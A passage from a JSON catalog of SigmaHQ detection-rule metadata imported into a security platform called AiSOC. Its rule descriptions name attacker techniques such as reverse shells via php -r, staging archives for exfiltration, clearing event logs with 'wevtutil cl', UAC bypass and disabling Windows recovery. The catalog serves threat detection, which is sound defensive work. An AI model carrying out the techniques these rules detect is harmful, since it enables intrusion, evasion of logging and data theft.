"AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-365-impossible-travel-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7eab125-5f94-43df-8710-795b80fa1189", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml" } }, { "id": "sigmahq-sigma-d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "type": "detection", "name": "Suspicious Control Panel DLL Load", "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-control-panel-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml" } }, { "id": "sigmahq-sigma-d7fb8f0e-bd5f-45c2-b467-19571c490d7e", "type": "detection", "name": "Cleartext Protocol Usage", "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "low", "category": "network", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/network/cleartext-protocol-usage.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/firewall/net_firewall_cleartext_protocols.yml" } }, { "id": "sigmahq-sigma-d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "type": "detection", "name": "Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE", "description": "Detects execution of arbitrary DLLs or unsigned code via a \".csproj\" files via Dotnet.EXE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-dll-or-csproj-code-execution-via-dotnet-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml" } }, { "id": "sigmahq-sigma-d81871ef-5738-47ab-9797-7a9c90cd4bfb", "type": "detection", "name": "Php Inline Command Execution", "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/php-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-d84c0ded-edd7-4123-80ed-348bb3ccc4d5", "type": "detection", "name": "Suspicious SQL Query", "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sql-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/database/db_anomalous_query.yml" } }, { "id": "sigmahq-sigma-d85873ef-a0f8-4c48-a53a-6b621f11729d", "type": "detection", "name": "Remote Access Tool - LogMeIn Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-logmein-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml" } }, { "id": "sigmahq-sigma-d87bd452-6da1-456e-8155-7dc988157b7d", "type": "detection", "name": "Suspicious Usage Of ShellExec_RunDLL", "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-usage-of-shellexec-rundll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d87bd452-6da1-456e-8155-7dc988157b7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml" } }, { "id": "sigmahq-sigma-d88d0ab2-e696-4d40-a2ed-9790064e66b3", "type": "detection", "name": "Modification of IE Registry Settings", "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modification-of-ie-registry-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_ie.yml" } }, { "id": "sigmahq-sigma-d8b0a4fe-07a8-41be-bd39-b14afa025d95", "type": "detection", "name": "Activity from Anonymous IP Addresses", "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-anonymous-ip-addresses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml" } }, { "id": "sigmahq-sigma-d8d97d51-122d-4cdd-9e2f-01b4b4933530", "type": "detection", "name": "Capabilities Discovery - Linux", "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/capabilities-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" } }, { "id": "sigmahq-sigma-d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "type": "detection", "name": "Remote Registry Recon", "description": "Detects remote RPC calls to collect information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-registry-recon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" } }, { "id": "sigmahq-sigma-d9047477-0359-48c9-b8c7-792cedcdc9c4", "type": "detection", "name": "PUA - NirCmd Execution As LOCAL SYSTEM", "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nircmd-execution-as-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml" } }, { "id": "sigmahq-sigma-d93129cd-1ee0-479f-bc03-ca6f129882e3", "type": "detection", "name": "Powershell Detect Virtualization Environment", "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-detect-virtualization-environment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" } }, { "id": "sigmahq-sigma-d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "type": "detection", "name": "HackTool - SharpLdapWhoami Execution", "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpldapwhoami-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml" } }, { "id": "sigmahq-sigma-d937b75f-a665-4480-88a5-2f20e9f9b22a", "type": "detection", "name": "Possible Privilege Escalation via Weak Service Permissions", "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-privilege-escalation-via-weak-service-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" } }, { "id": "sigmahq-sigma-d94a35f0-7a29-45f6-90a0-80df6159967c", "type": "detection", "name": "Cisco Denial of Service", "description": "Detect a system being shutdown or put into different boot mode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1495", "T1529", "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-denial-of-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d94a35f0-7a29-45f6-90a0-80df6159967c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_dos.yml" } }, { "id": "sigmahq-sigma-d9557b75-267b-4b43-922f-a775e2d1f792", "type": "detection", "name": "Azure Point-to-site VPN Modified or Deleted", "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-point-to-site-vpn-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d9557b75-267b-4b43-922f-a775e2d1f792", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "type": "detection", "name": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE\nCheck if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-group-and-account-reconnaissance-activity-using-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml" } }, { "id": "sigmahq-sigma-d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "type": "detection", "name": "Security Eventlog Cleared", "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_audit_log_cleared.yml" } }, { "id": "sigmahq-sigma-da2738f2-fadb-4394-afa7-0a0674885afa", "type": "detection", "name": "Sdclt Child Processes", "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sdclt-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "da2738f2-fadb-4394-afa7-0a0674885afa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" } }, { "id": "sigmahq-sigma-da34e323-1e65-42db-83be-a6725ac2caa3", "type": "detection", "name": "Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock", "description": "Detects the execution of powershell scripts with calls to the \"Start-NetEventSession\" cmdlet. Which allows an attacker to start event and packet capture for a network event session.\nAdversaries may attempt to capture network to gather information over the course of an operation.\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-packet-capture-activity-via-start-neteventsession-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "da34e323-1e65-42db-83be-a6725ac2caa3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_packet_capture.yml" } }, { "id": "sigmahq-sigma-dae8171c-5ec6-4396-b210-8466585b53e9", "type": "detection", "name": "SCM Database Privileged Operation", "description": "Detects non-system users performing privileged operation os the SCM database", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scm-database-privileged-operation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dae8171c-5ec6-4396-b210-8466585b53e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" } }, { "id": "sigmahq-sigma-daf7eb81-35fd-410d-9d7a-657837e602bb", "type": "detection", "name": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/zip-a-folder-with-powershell-for-staging-in-temp-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" } }, { "id": "sigmahq-sigma-db014773-7375-4f4e-b83b-133337c0ffee", "type": "detection", "name": "AWS IAM S3Browser Templated S3 Bucket Policy Creation", "description": "Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.009", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-iam-s3browser-templated-s3-bucket-policy-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db014773-7375-4f4e-b83b-133337c0ffee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml" } }, { "id": "sigmahq-sigma-db014773-b1d3-46bd-ba26-133337c0ffee", "type": "detection", "name": "AWS IAM S3Browser LoginProfile Creation", "description": "Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.009", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-iam-s3browser-loginprofile-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db014773-b1d3-46bd-ba26-133337c0ffee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml" } }, { "id": "sigmahq-sigma-db014773-d9d9-4792-91e5-133337c0ffee", "type": "detection", "name": "AWS IAM S3Browser User or AccessKey Creation", "description": "Detects S3 Browser utility creating IAM User or AccessKey.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.009", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-iam-s3browser-user-or-accesskey-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db014773-d9d9-4792-91e5-133337c0ffee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml" } }, { "id": "sigmahq-sigma-db1ac3be-f606-4e3a-89e0-9607cbe6b98a", "type": "detection", "name": "Capsh Shell Invocation - Linux", "description": "Detects the use of the \"capsh\" utility to invoke a shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/capsh-shell-invocation-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db1ac3be-f606-4e3a-89e0-9607cbe6b98a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml" } }, { "id": "sigmahq-sigma-db1c21e4-cd66-4b4e-85ca-590f0780529c", "type": "detection", "name": "Windows Recovery Environment Disabled Via Reagentc", "description": "Detects attempts to disable windows recovery environment using Reagentc.\nReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).\nIt allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recovery-environment-disabled-via-reagentc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db1c21e4-cd66-4b4e-85ca-590f0780529c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reagentc_disable_windows_recovery_environment.yml" } }, { "id": "sigmahq-sigma-db6c06c4-bf3b-421c-aa88-15672b88c743", "type": "detection", "name": "Changes To PIM Settings", "description": "Detects when changes are made to PIM roles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/changes-to-pim-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db6c06c4-bf3b-421c-aa88-15672b88c743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_pim_change_settings.yml" } }, { "id": "sigmahq-sigma-db77ce78-7e28-4188-9337-cf30e2b3ba9f", "type": "detection", "name": "Potential Wazuh Security Platform DLL Sideloading", "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 